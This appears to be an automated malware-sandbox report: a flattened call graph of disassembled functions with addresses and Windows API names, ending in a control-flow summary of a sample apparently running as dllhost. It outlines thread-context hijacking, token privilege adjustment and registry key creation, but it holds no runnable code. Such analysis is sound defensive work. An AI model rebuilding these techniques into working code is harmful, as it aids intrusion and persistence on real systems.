279a92adbb8 19079->19081 19080 279a92add78 14 API calls 19080->19088 19081->19082 19083 279a92ad2a0 __free_lconv_num 13 API calls 19081->19083 19082->19070 19083->19082 19084 279a92af198 9 API calls 19084->19088 19085 279a92ad4ac 16 API calls 19085->19088 19086 279a92ad894 56 API calls 19086->19088 19087 279a92adcc8 FindNextFileW 19087->19088 19089 279a92adce0 19087->19089 19088->19080 19088->19084 19088->19085 19088->19086 19088->19087 19090 279a92ad2a0 13 API calls __free_lconv_num 19088->19090 19091 279a92add2a 19088->19091 19092 279a92add0c FindClose 19089->19092 19094 279a92b0b20 38 API calls 19089->19094 19090->19088 19093 279a92add38 FindClose 19091->19093 19096 279a92ad2a0 __free_lconv_num 13 API calls 19091->19096 19092->19082 19095 279a92add1c 19092->19095 19093->19082 19097 279a92add48 19093->19097 19094->19092 19098 279a92ad2a0 __free_lconv_num 13 API calls 19095->19098 19096->19093 19099 279a92ad2a0 __free_lconv_num 13 API calls 19097->19099 19098->19082 19099->19082 19104 279a92b0ed5 19100->19104 19101 279a92b0eda 19102 279a92b0ef0 19101->19102 19103 279a92ad1f4 __std_exception_copy 13 API calls 19101->19103 19102->18989 19105 279a92b0ee4 19103->19105 19104->19101 19104->19102 19107 279a92b0f24 19104->19107 19106 279a92ad04c _invalid_parameter_noinfo 38 API calls 19105->19106 19106->19102 19107->19102 19108 279a92ad1f4 __std_exception_copy 13 API calls 19107->19108 19108->19105 19110 279a92aef02 19109->19110 19111 279a92aef1f 19109->19111 19110->19111 19112 279a92aef10 19110->19112 19113 279a92aef29 19111->19113 19179 279a92b19f0 19111->19179 19114 279a92ad1f4 __std_exception_copy 13 API calls 19112->19114 19186 279a92b1a40 19113->19186 19116 279a92aef15 19114->19116 19116->19022 19119 279a92b13e0 19118->19119 19120 279a92b13f5 19119->19120 19122 279a92b140e 19119->19122 19121 279a92ad1f4 __std_exception_copy 13 API calls 19120->19121 19123 279a92b13fa 19121->19123 19124 279a92add78 14 API calls 19122->19124 19126 279a92b1405 19122->19126 19125 279a92ad04c _invalid_parameter_noinfo 38 API calls 19123->19125 19124->19126 19125->19126 19126->19023 19128 279a92ad336 19127->19128 19129 279a92ad35a 19127->19129 19130 279a92ad345 FindFirstFileExW 19128->19130 19133 279a92ad2a0 __free_lconv_num 13 API calls 19128->19133 19131 279a92ad3bf 19129->19131 19132 279a92ad35f 19129->19132 19130->19041 19130->19051 19134 279a92aec58 MultiByteToWideChar 19131->19134 19132->19130 19135 279a92ad2a0 __free_lconv_num 13 API calls 19132->19135 19140 279a92ad374 19132->19140 19133->19130 19138 279a92ad3db 19134->19138 19135->19140 19136 279a92ac5d0 14 API calls 19136->19130 19137 279a92ad3e2 GetLastError 19141 279a92ad184 13 API calls 19137->19141 19138->19137 19139 279a92ad420 19138->19139 19142 279a92ad413 19138->19142 19145 279a92ad2a0 __free_lconv_num 13 API calls 19138->19145 19139->19130 19143 279a92aec58 MultiByteToWideChar 19139->19143 19140->19136 19144 279a92ad3ef 19141->19144 19146 279a92ac5d0 14 API calls 19142->19146 19147 279a92ad47a 19143->19147 19148 279a92ad1f4 __std_exception_copy 13 API calls 19144->19148 19145->19142 19146->19139 19147->19130 19147->19137 19148->19130 19150 279a92ad4d6 19149->19150 19151 279a92ad4fa 19149->19151 19153 279a92ad2a0 __free_lconv_num 13 API calls 19150->19153 19160 279a92ad4e5 19150->19160 19152 279a92ad55f 19151->19152 19155 279a92ad500 19151->19155 19154 279a92aece8 WideCharToMultiByte 19152->19154 19153->19160 19165 279a92ad583 19154->19165 19156 279a92ad515 19155->19156 19159 279a92ad2a0 __free_lconv_num 13 API calls 19155->19159 19155->19160 19157 279a92ac5d0 14 API calls 19156->19157 19157->19160 19158 279a92ad58a GetLastError 19161 279a92ad184 13 API calls 19158->19161 19159->19156 19160->19051 19164 279a92ad597 19161->19164 19162 279a92ad5c7 19162->19160 19163 279a92aece8 WideCharToMultiByte 19162->19163 19169 279a92ad629 19163->19169 19170 279a92ad1f4 __std_exception_copy 13 API calls 19164->19170 19165->19158 19165->19162 19166 279a92ad5bb 19165->19166 19167 279a92ad2a0 __free_lconv_num 13 API calls 19165->19167 19168 279a92ac5d0 14 API calls 19166->19168 19167->19166 19168->19162 19169->19158 19169->19160 19170->19160 19172 279a92b0b52 19171->19172 19173 279a92ad1f4 __std_exception_copy 13 API calls 19172->19173 19178 279a92b0b67 19172->19178 19174 279a92b0b5c 19173->19174 19175 279a92ad04c _invalid_parameter_noinfo 38 API calls 19174->19175 19175->19178 19176 279a92a8070 _invalid_parameter_noinfo 8 API calls 19177 279a92b0ea8 19176->19177 19177->19055 19178->19176 19180 279a92b1a12 HeapSize 19179->19180 19181 279a92b19f9 19179->19181 19182 279a92ad1f4 __std_exception_copy 13 API calls 19181->19182 19183 279a92b19fe 19182->19183 19184 279a92ad04c _invalid_parameter_noinfo 38 API calls 19183->19184 19185 279a92b1a09 19184->19185 19185->19113 19187 279a92b1a55 19186->19187 19188 279a92b1a5f 19186->19188 19189 279a92ac5d0 14 API calls 19187->19189 19190 279a92b1a64 19188->19190 19196 279a92b1a6b __std_exception_copy 19188->19196 19195 279a92b1a5d 19189->19195 19191 279a92ad2a0 __free_lconv_num 13 API calls 19190->19191 19191->19195 19192 279a92b1a71 19194 279a92ad1f4 __std_exception_copy 13 API calls 19192->19194 19193 279a92b1a9e HeapReAlloc 19193->19195 19193->19196 19194->19195 19195->19116 19196->19192 19196->19193 19197 279a92ab470 __std_exception_copy 2 API calls 19196->19197 19197->19196 19198 279a927824c 19200 279a9278270 __scrt_acquire_startup_lock 19198->19200 19199 279a927b581 19200->19199 19201 279a927cb10 __std_exception_copy 13 API calls 19200->19201 19202 279a927b5aa 19201->19202 19203 279a927d658 19204 279a927d67d 19203->19204 19209 279a927d694 19203->19209 19205 279a927d1f4 __std_exception_copy 13 API calls 19204->19205 19206 279a927d682 19205->19206 19208 279a927d04c _invalid_parameter_noinfo 38 API calls 19206->19208 19207 279a927d724 19211 279a927bb54 13 API calls 19207->19211 19210 279a927d68d 19208->19210 19209->19207 19219 279a927d7b6 19209->19219 19221 279a927d6da 19209->19221 19236 279a927d894 19209->19236 19298 279a927da18 19209->19298 19212 279a927d77c 19211->19212 19215 279a927d784 19212->19215 19224 279a927d7d7 19212->19224 19216 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19215->19216 19218 279a927d78b 19216->19218 19217 279a927d836 19220 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19217->19220 19222 279a927d6fd 19218->19222 19225 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19218->19225 19219->19222 19228 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19219->19228 19223 279a927d841 19220->19223 19221->19222 19229 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19221->19229 19226 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19222->19226 19227 279a927d85a 19223->19227 19231 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19223->19231 19224->19217 19233 279a927d87c 19224->19233 19335 279a9280eb8 19224->19335 19225->19218 19226->19210 19232 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19227->19232 19228->19219 19229->19221 19231->19223 19232->19210 19234 279a927d06c _invalid_parameter_noinfo 17 API calls 19233->19234 19235 279a927d891 19234->19235 19237 279a927d8c2 19236->19237 19237->19237 19238 279a927d8de 19237->19238 19239 279a927d220 _invalid_parameter_noinfo 13 API calls 19237->19239 19238->19209 19240 279a927d90d 19239->19240 19241 279a927d926 19240->19241 19242 279a9280eb8 38 API calls 19240->19242 19243 279a9280eb8 38 API calls 19241->19243 19245 279a927d9fc 19241->19245 19242->19241 19244 279a927d943 19243->19244 19244->19245 19247 279a927d97f 19244->19247 19248 279a927d962 19244->19248 19249 279a927d98d 19244->19249 19246 279a927d06c _invalid_parameter_noinfo 17 API calls 19245->19246 19258 279a927da17 19246->19258 19252 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19247->19252 19251 279a927d220 _invalid_parameter_noinfo 13 API calls 19248->19251 19250 279a927d977 19249->19250 19344 279a927eee0 19249->19344 19250->19247 19255 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19250->19255 19256 279a927d96d 19251->19256 19252->19245 19254 279a927da7a 19263 279a927da8c 19254->19263 19267 279a927daa1 19254->19267 19255->19247 19259 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19256->19259 19257 279a927d9b5 19260 279a927d9ba 19257->19260 19261 279a927d9d0 19257->19261 19258->19254 19353 279a92813d8 19258->19353 19259->19250 19264 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19260->19264 19265 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19261->19265 19266 279a927d894 52 API calls 19263->19266 19264->19250 19265->19247 19268 279a927da9c 19266->19268 19270 279a927dd78 14 API calls 19267->19270 19269 279a9278070 _invalid_parameter_noinfo 8 API calls 19268->19269 19271 279a927dd64 19269->19271 19272 279a927db0b 19270->19272 19271->19209 19273 279a927db1a 19272->19273 19274 279a927f198 9 API calls 19272->19274 19362 279a927d30c 19273->19362 19274->19273 19277 279a927dba8 19278 279a927d894 52 API calls 19277->19278 19280 279a927dbb8 19278->19280 19279 279a927dd78 14 API calls 19286 279a927dbd2 19279->19286 19280->19268 19281 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19280->19281 19281->19268 19282 279a927f198 9 API calls 19282->19286 19284 279a927d894 52 API calls 19284->19286 19285 279a927dcc8 FindNextFileW 19285->19286 19287 279a927dce0 19285->19287 19286->19279 19286->19282 19286->19284 19286->19285 19288 279a927dd2a 19286->19288 19295 279a927d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 19286->19295 19384 279a927d4ac 19286->19384 19289 279a927dd0c FindClose 19287->19289 19406 279a9280b20 19287->19406 19290 279a927dd38 FindClose 19288->19290 19293 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19288->19293 19289->19268 19292 279a927dd1c 19289->19292 19290->19268 19294 279a927dd48 19290->19294 19296 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19292->19296 19293->19290 19297 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19294->19297 19295->19286 19296->19268 19297->19268 19299 279a927da58 19298->19299 19300 279a927da7a 19298->19300 19299->19300 19301 279a92813d8 38 API calls 19299->19301 19302 279a927da8c 19300->19302 19304 279a927daa1 19300->19304 19301->19299 19303 279a927d894 56 API calls 19302->19303 19317 279a927da9c 19303->19317 19306 279a927dd78 14 API calls 19304->19306 19305 279a9278070 _invalid_parameter_noinfo 8 API calls 19307 279a927dd64 19305->19307 19308 279a927db0b 19306->19308 19307->19209 19309 279a927db1a 19308->19309 19310 279a927f198 9 API calls 19308->19310 19311 279a927d30c 16 API calls 19309->19311 19310->19309 19312 279a927db7b FindFirstFileExW 19311->19312 19313 279a927dba8 19312->19313 19323 279a927dbd2 19312->19323 19314 279a927d894 56 API calls 19313->19314 19316 279a927dbb8 19314->19316 19315 279a927dd78 14 API calls 19315->19323 19316->19317 19318 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19316->19318 19317->19305 19318->19317 19319 279a927f198 9 API calls 19319->19323 19320 279a927d4ac 16 API calls 19320->19323 19321 279a927d894 56 API calls 19321->19323 19322 279a927dcc8 FindNextFileW 19322->19323 19324 279a927dce0 19322->19324 19323->19315 19323->19319 19323->19320 19323->19321 19323->19322 19325 279a927dd2a 19323->19325 19332 279a927d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 19323->19332 19326 279a927dd0c FindClose 19324->19326 19328 279a9280b20 38 API calls 19324->19328 19327 279a927dd38 FindClose 19325->19327 19330 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19325->19330 19326->19317 19329 279a927dd1c 19326->19329 19327->19317 19331 279a927dd48 19327->19331 19328->19326 19333 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19329->19333 19330->19327 19334 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19331->19334 19332->19323 19333->19317 19334->19317 19340 279a9280ed5 19335->19340 19336 279a9280eda 19337 279a9280ef0 19336->19337 19338 279a927d1f4 __std_exception_copy 13 API calls 19336->19338 19337->19224 19339 279a9280ee4 19338->19339 19341 279a927d04c _invalid_parameter_noinfo 38 API calls 19339->19341 19340->19336 19340->19337 19342 279a9280f24 19340->19342 19341->19337 19342->19337 19343 279a927d1f4 __std_exception_copy 13 API calls 19342->19343 19343->19339 19345 279a927ef02 19344->19345 19346 279a927ef1f 19344->19346 19345->19346 19348 279a927ef10 19345->19348 19347 279a927ef29 19346->19347 19414 279a92819f0 19346->19414 19421 279a9281a40 19347->19421 19349 279a927d1f4 __std_exception_copy 13 API calls 19348->19349 19352 279a927ef15 19349->19352 19352->19257 19354 279a92813e0 19353->19354 19355 279a92813f5 19354->19355 19356 279a928140e 19354->19356 19357 279a927d1f4 __std_exception_copy 13 API calls 19355->19357 19358 279a9281405 19356->19358 19360 279a927dd78 14 API calls 19356->19360 19359 279a92813fa 19357->19359 19358->19258 19361 279a927d04c _invalid_parameter_noinfo 38 API calls 19359->19361 19360->19358 19361->19358 19363 279a927d336 19362->19363 19364 279a927d35a 19362->19364 19367 279a927d345 FindFirstFileExW 19363->19367 19369 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19363->19369 19365 279a927d3bf 19364->19365 19366 279a927d35f 19364->19366 19368 279a927ec58 MultiByteToWideChar 19365->19368 19366->19367 19370 279a927d374 19366->19370 19371 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19366->19371 19367->19277 19367->19286 19376 279a927d3db 19368->19376 19369->19367 19372 279a927c5d0 14 API calls 19370->19372 19371->19370 19372->19367 19373 279a927d3e2 GetLastError 19374 279a927d184 13 API calls 19373->19374 19375 279a927d3ef 19374->19375 19378 279a927d1f4 __std_exception_copy 13 API calls 19375->19378 19376->19373 19379 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19376->19379 19382 279a927d413 19376->19382 19383 279a927d420 19376->19383 19377 279a927ec58 MultiByteToWideChar 19381 279a927d47a 19377->19381 19378->19367 19379->19382 19380 279a927c5d0 14 API calls 19380->19383 19381->19367 19381->19373 19382->19380 19383->19367 19383->19377 19385 279a927d4d6 19384->19385 19386 279a927d4fa 19384->19386 19390 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19385->19390 19391 279a927d4e5 19385->19391 19387 279a927d55f 19386->19387 19388 279a927d500 19386->19388 19389 279a927ece8 WideCharToMultiByte 19387->19389 19388->19391 19392 279a927d515 19388->19392 19394 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19388->19394 19399 279a927d583 19389->19399 19390->19391 19391->19286 19395 279a927c5d0 14 API calls 19392->19395 19393 279a927d58a GetLastError 19396 279a927d184 13 API calls 19393->19396 19394->19392 19395->19391 19398 279a927d597 19396->19398 19397 279a927ece8 WideCharToMultiByte 19400 279a927d629 19397->19400 19401 279a927d1f4 __std_exception_copy 13 API calls 19398->19401 19399->19393 19402 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19399->19402 19404 279a927d5bb 19399->19404 19405 279a927d5c7 19399->19405 19400->19391 19400->19393 19401->19391 19402->19404 19403 279a927c5d0 14 API calls 19403->19405 19404->19403 19405->19391 19405->19397 19407 279a9280b52 19406->19407 19408 279a927d1f4 __std_exception_copy 13 API calls 19407->19408 19413 279a9280b67 19407->19413 19409 279a9280b5c 19408->19409 19410 279a927d04c _invalid_parameter_noinfo 38 API calls 19409->19410 19410->19413 19411 279a9278070 _invalid_parameter_noinfo 8 API calls 19412 279a9280ea8 19411->19412 19412->19289 19413->19411 19415 279a9281a12 HeapSize 19414->19415 19416 279a92819f9 19414->19416 19417 279a927d1f4 __std_exception_copy 13 API calls 19416->19417 19418 279a92819fe 19417->19418 19419 279a927d04c _invalid_parameter_noinfo 38 API calls 19418->19419 19420 279a9281a09 19419->19420 19420->19347 19422 279a9281a55 19421->19422 19423 279a9281a5f 19421->19423 19425 279a927c5d0 14 API calls 19422->19425 19424 279a9281a64 19423->19424 19431 279a9281a6b _invalid_parameter_noinfo 19423->19431 19426 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19424->19426 19429 279a9281a5d 19425->19429 19426->19429 19427 279a9281a71 19430 279a927d1f4 __std_exception_copy 13 API calls 19427->19430 19428 279a9281a9e HeapReAlloc 19428->19429 19428->19431 19429->19352 19430->19429 19431->19427 19431->19428 19432 279a927b470 _invalid_parameter_noinfo 2 API calls 19431->19432 19432->19431 19438 279a9272e54 19440 279a9272ea8 19438->19440 19439 279a9272ec3 19440->19439 19442 279a92737f4 19440->19442 19443 279a927388a 19442->19443 19445 279a9273819 19442->19445 19443->19439 19444 279a9273f88 StrCmpNIW 19444->19445 19445->19443 19445->19444 19446 279a9271e08 StrCmpIW StrCmpW 19445->19446 19446->19445 16518 279a928494f 16519 279a9284968 16518->16519 16520 279a928495e 16518->16520 16522 279a927c5ac LeaveCriticalSection 16520->16522 18415 279a9274320 18416 279a927426d 18415->18416 18417 279a92742bd VirtualQuery 18416->18417 18418 279a92742d7 18416->18418 18419 279a9274322 GetLastError 18416->18419 18417->18416 18417->18418 18419->18416 17661 279a927c828 17662 279a927c842 17661->17662 17663 279a927c82d 17661->17663 17667 279a927c848 17663->17667 17668 279a927c88a 17667->17668 17671 279a927c892 17667->17671 17669 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17668->17669 17669->17671 17670 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17672 279a927c89f 17670->17672 17671->17670 17673 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17672->17673 17674 279a927c8ac 17673->17674 17675 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17674->17675 17676 279a927c8b9 17675->17676 17677 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17676->17677 17678 279a927c8c6 17677->17678 17679 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17678->17679 17680 279a927c8d3 17679->17680 17681 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17680->17681 17682 279a927c8e0 17681->17682 17683 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17682->17683 17684 279a927c8ed 17683->17684 17685 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17684->17685 17686 279a927c8fd 17685->17686 17687 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17686->17687 17688 279a927c90d 17687->17688 17693 279a927c6f8 17688->17693 17707 279a927c558 EnterCriticalSection 17693->17707 17718 279a927f820 17721 279a927f7d8 17718->17721 17726 279a927c558 EnterCriticalSection 17721->17726 19459 279a927fe20 19460 279a927fe4a 19459->19460 19461 279a927d220 _invalid_parameter_noinfo 13 API calls 19460->19461 19462 279a927fe6a 19461->19462 19463 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19462->19463 19464 279a927fe78 19463->19464 19465 279a927fea2 19464->19465 19466 279a927d220 _invalid_parameter_noinfo 13 API calls 19464->19466 19467 279a927fec1 InitializeCriticalSectionEx 19465->19467 19470 279a927feab 19465->19470 19468 279a927fe94 19466->19468 19467->19465 19469 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19468->19469 19469->19465 17727 279a9276430 17728 279a927643d 17727->17728 17729 279a9276449 17728->17729 17734 279a927655a 17728->17734 17730 279a92764cd 17729->17730 17731 279a92764a6 SetThreadContext 17729->17731 17731->17730 17732 279a927663e 17735 279a927665e 17732->17735 17737 279a9274b20 VirtualFree 17732->17737 17733 279a9276581 VirtualProtect FlushInstructionCache 17733->17734 17734->17732 17734->17733 17736 279a9275530 3 API calls 17735->17736 17740 279a9276663 17736->17740 17737->17735 17738 279a92766b7 17741 279a9278070 _invalid_parameter_noinfo 8 API calls 17738->17741 17739 279a9276677 ResumeThread 17739->17740 17740->17738 17740->17739 17742 279a92766ff 17741->17742 16785 279a927bd34 16786 279a927bd49 16785->16786 16787 279a927bd4d 16785->16787 16800 279a927e864 16787->16800 16792 279a927bd6b 16826 279a927bda8 16792->16826 16793 279a927bd5f 16794 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16793->16794 16794->16786 16797 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16798 279a927bd92 16797->16798 16799 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16798->16799 16799->16786 16801 279a927e871 16800->16801 16802 279a927bd52 16800->16802 16845 279a927cacc 16801->16845 16806 279a927edc8 GetEnvironmentStringsW 16802->16806 16804 279a927e8a0 16850 279a927e53c 16804->16850 16807 279a927bd57 16806->16807 16808 279a927edf8 16806->16808 16807->16792 16807->16793 16809 279a927ece8 WideCharToMultiByte 16808->16809 16810 279a927ee49 16809->16810 16811 279a927ee53 FreeEnvironmentStringsW 16810->16811 16812 279a927c5d0 14 API calls 16810->16812 16811->16807 16813 279a927ee63 16812->16813 16814 279a927ee74 16813->16814 16815 279a927ee6b 16813->16815 16817 279a927ece8 WideCharToMultiByte 16814->16817 16816 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16815->16816 16818 279a927ee72 16816->16818 16819 279a927ee97 16817->16819 16818->16811 16820 279a927eea5 16819->16820 16821 279a927ee9b 16819->16821 16823 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16820->16823 16822 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16821->16822 16824 279a927eea3 FreeEnvironmentStringsW 16822->16824 16823->16824 16824->16807 16827 279a927bdcd 16826->16827 16828 279a927d220 _invalid_parameter_noinfo 13 API calls 16827->16828 16841 279a927be03 16828->16841 16829 279a927be0b 16830 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16829->16830 16832 279a927bd73 16830->16832 16831 279a927be6d 16833 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16831->16833 16832->16797 16833->16832 16834 279a927d220 _invalid_parameter_noinfo 13 API calls 16834->16841 16835 279a927be92 17041 279a927bebc 16835->17041 16837 279a927c328 __std_exception_copy 38 API calls 16837->16841 16839 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16839->16829 16840 279a927bea6 16842 279a927d06c _invalid_parameter_noinfo 17 API calls 16840->16842 16841->16829 16841->16831 16841->16834 16841->16835 16841->16837 16841->16840 16843 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16841->16843 16844 279a927beb9 16842->16844 16843->16841 16846 279a927cae8 FlsGetValue 16845->16846 16847 279a927cae4 16845->16847 16846->16847 16848 279a927cafe 16847->16848 16849 279a927c940 _invalid_parameter_noinfo 13 API calls 16847->16849 16848->16804 16849->16848 16873 279a927e7ac 16850->16873 16855 279a927e58e 16855->16802 16858 279a927e5a7 16859 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16858->16859 16859->16855 16860 279a927e5b6 16860->16860 16899 279a927e8e0 16860->16899 16863 279a927e6b2 16864 279a927d1f4 __std_exception_copy 13 API calls 16863->16864 16865 279a927e6b7 16864->16865 16867 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16865->16867 16866 279a927e70d 16869 279a927e774 16866->16869 16910 279a927e05c 16866->16910 16867->16855 16868 279a927e6cc 16868->16866 16871 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16868->16871 16870 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16869->16870 16870->16855 16871->16866 16874 279a927e7cf 16873->16874 16879 279a927e7d9 16874->16879 16925 279a927c558 EnterCriticalSection 16874->16925 16880 279a927e571 16879->16880 16882 279a927cacc 14 API calls 16879->16882 16885 279a927e22c 16880->16885 16883 279a927e8a0 16882->16883 16884 279a927e53c 56 API calls 16883->16884 16884->16880 16926 279a927dd78 16885->16926 16888 279a927e24c GetOEMCP 16891 279a927e273 16888->16891 16889 279a927e25e 16890 279a927e263 GetACP 16889->16890 16889->16891 16890->16891 16891->16855 16892 279a927c5d0 16891->16892 16893 279a927c61b 16892->16893 16897 279a927c5df _invalid_parameter_noinfo 16892->16897 16894 279a927d1f4 __std_exception_copy 13 API calls 16893->16894 16896 279a927c619 16894->16896 16895 279a927c602 HeapAlloc 16895->16896 16895->16897 16896->16858 16896->16860 16897->16893 16897->16895 16898 279a927b470 _invalid_parameter_noinfo 2 API calls 16897->16898 16898->16897 16900 279a927e22c 16 API calls 16899->16900 16901 279a927e91b 16900->16901 16902 279a927e958 IsValidCodePage 16901->16902 16907 279a927ea71 16901->16907 16909 279a927e972 16901->16909 16904 279a927e969 16902->16904 16902->16907 16903 279a9278070 _invalid_parameter_noinfo 8 API calls 16905 279a927e6a9 16903->16905 16906 279a927e998 GetCPInfo 16904->16906 16904->16909 16905->16863 16905->16868 16906->16907 16906->16909 16907->16903 16942 279a927e344 16909->16942 17040 279a927c558 EnterCriticalSection 16910->17040 16927 279a927dd9c 16926->16927 16933 279a927dd97 16926->16933 16928 279a927cab0 _invalid_parameter_noinfo 14 API calls 16927->16928 16927->16933 16929 279a927ddb7 16928->16929 16934 279a927ffb4 16929->16934 16933->16888 16933->16889 16935 279a927ffc9 16934->16935 16936 279a927ddda 16934->16936 16935->16936 16937 279a9280a40 _invalid_parameter_noinfo 14 API calls 16935->16937 16938 279a9280020 16936->16938 16937->16936 16939 279a9280035 16938->16939 16940 279a9280048 16938->16940 16939->16940 16941 279a927e8c4 _invalid_parameter_noinfo 14 API calls 16939->16941 16940->16933 16941->16940 16943 279a927e38f GetCPInfo 16942->16943 16952 279a927e485 16942->16952 16946 279a927e3a2 16943->16946 16943->16952 16944 279a9278070 _invalid_parameter_noinfo 8 API calls 16945 279a927e524 16944->16945 16945->16907 16953 279a9281474 16946->16953 16952->16944 16954 279a927dd78 14 API calls 16953->16954 16955 279a92814b6 16954->16955 16973 279a927ec58 16955->16973 16975 279a927ec61 MultiByteToWideChar 16973->16975 17042 279a927bec1 17041->17042 17043 279a927be9a 17041->17043 17044 279a927beea 17042->17044 17045 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17042->17045 17043->16839 17046 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17044->17046 17045->17042 17046->17043 17760 279a927ec30 GetCommandLineA GetCommandLineW

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 140002d4c-140002d5c 1 140002d5e-140002d75 OpenMutexW 0->1 2 140002d84-140002dc1 CloseHandle call 140002a0c * 2 GetCurrentProcessId OpenProcess 1->2 3 140002d77-140002d82 Sleep 1->3 8 140002dc3-140002dd7 OpenProcessToken 2->8 9 140002e39-140002e64 RegOpenKeyExW 2->9 3->1 10 140002dd9-140002dee LookupPrivilegeValueW 8->10 11 140002e30-140002e33 CloseHandle 8->11 12 1400031b3-1400031c1 9->12 13 140002e6a-140002e94 RegQueryValueExW 9->13 10->11 14 140002df0-140002e28 AdjustTokenPrivileges 10->14 11->9 13->12 15 140002e9a-140002ec4 RegQueryValueExW 13->15 14->11 16 140002e2a GetLastError 14->16 15->12 17 140002eca-140002f36 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 15->17 16->11 17->12 18 140002f3c-140002f66 RegQueryValueExW 17->18 18->12 19 140002f6c-140002fba RegCloseKey GetCurrentProcessId call 14000200c RegCreateKeyExW 18->19 22 14000307d-140003111 CreateThread GetProcessHeap HeapAlloc CreateThread * 2 call 14000151c 19->22 23 140002fc0-140002fe6 ConvertStringSecurityDescriptorToSecurityDescriptorW 19->23 30 140003113-140003143 ShellExecuteW 22->30 31 140003145-1400031ad call 14000148c call 1400011d4 call 14000148c * 3 call 1400011d4 * 3 GetProcessHeap HeapFree SleepEx 22->31 25 140003002-14000303a RegCreateKeyExW 23->25 26 140002fe8-140002ffc RegSetKeySecurity LocalFree 23->26 27 140003073-140003077 RegCloseKey 25->27 28 14000303c-14000306d GetCurrentProcessId RegSetValueExW RegCloseKey 25->28 26->25 27->22 28->27 30->30 30->31 31->12
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
